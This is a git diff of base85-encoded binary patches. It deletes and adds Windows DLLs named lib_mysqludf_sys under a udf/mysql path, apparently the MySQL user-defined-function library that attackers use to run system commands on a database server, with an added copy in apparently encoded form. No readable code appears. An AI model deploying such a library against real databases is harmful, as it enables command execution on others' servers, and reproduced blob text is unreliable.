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

literal 0
HcmV?d00001

diff --git a/udf/mysql/windows/32/lib_mysqludf_sys.dll b/udf/mysql/windows/32/lib_mysqludf_sys.dll
deleted file mode 100644
index a2196a25e9d51d88080807d24916f3734b3e2e19..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 6144
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

diff --git a/udf/mysql/windows/32/lib_mysqludf_sys.dll_ b/udf/mysql/windows/32/lib_mysqludf_sys.dll_
new file mode 100644
index 0000000000000000000000000000000000000000..ae438d63619bd09e27b0a68f7858db75f4017a23
GIT binary patch
literal 4309
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
D+}K`!

literal 0
HcmV?d00001

diff --git a/udf/mysql/windows/64/lib_mysqludf_sys.dll b/udf/mysql/windows/64/lib_mysqludf_sys.dll
deleted file mode 100644
index 3de734fc9f449952ac1a765c52c58434167a0d6a..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 11264
zcmeHN4RBOdmcE^IhY*Mzz{a3PAE9wr9YaXt7zojBlgJIcV1xh}hq38&UPx=FyX}6B
zFzdKv8%DaWZBaXpKRZ*7j_#B@<0?~Zjo>(%NQMxNETFSSu~t-^Z463qEMe50x8J$%
zb!b4htlFxrt<p!`cg{Wc+;h%7_uTW&P1ADIHde?Ov!fXXV><!q@yhrA{2IgXd6zzO
z9{bmcFVEa*Q(vCh)*VVHv3PV{JkX;A1CdBnS2{E$o{T7=h|+k&3Z*C7sa2Jhmbfj^
zo)<nieEXxR9k~`dQMMzAe&__-@k0qG$bPGKYKJcQ{(i^zB)w$EdI_gn{8Oy{R0)@d
zg54zZ>=m>&G1mE`A{P5iYH4n4j8!U=3MMi(6_n{Fb^e8bWfI?HBS3foV-9-Z$w9UW
z9XQXkkA}TqH7Di3xqXYW05TxTJD;&dBycTb+evgQW8G3A5%I*vC7AuM`mV;*d^u;$
ztJ1X%I%reKTxzs-3WB^xfmK!U&VU|(t&=bSnQSte<s)G7@nRWOCL0@ZfCK`Z!B{0)
z-s5GguPSCT$~CrPkoa=JVDW;_TNO{lgXl}2tOY{0U51wTcqN|}j)GB&h+&ZAU7p7T
z)XUg)XHvfD<vfsD$n;h&9FNUptU1kq{X$~iVxT`a(K4VvGtqLO51Oa~^ga`v<9yoj
zW1wBWw6}V@ZFf!I?qTZzQ?Fzq(SK*Mlju84v`jdD01WfWAtM2lWL)h0ts_L_t=>y~
zgSJaxY_l+BrWV?gPA;x1PSvtx(H@%(x*)DziX$C$5|ifFnkbonm5Gx1H72S+-&~-i
zZw~a$1`d6f!~C4>1idSG>KK-~q^w!I&c#H-^~R-)sbYk0=}Vr+h3amF5j-`Zd~Y{T
z-{G$I^zqb?(JVgu=t(ZnZx*}x$phRNN>4Jm@}&<C^Yj{b@oLhMT3FBwvEncKN}eh0
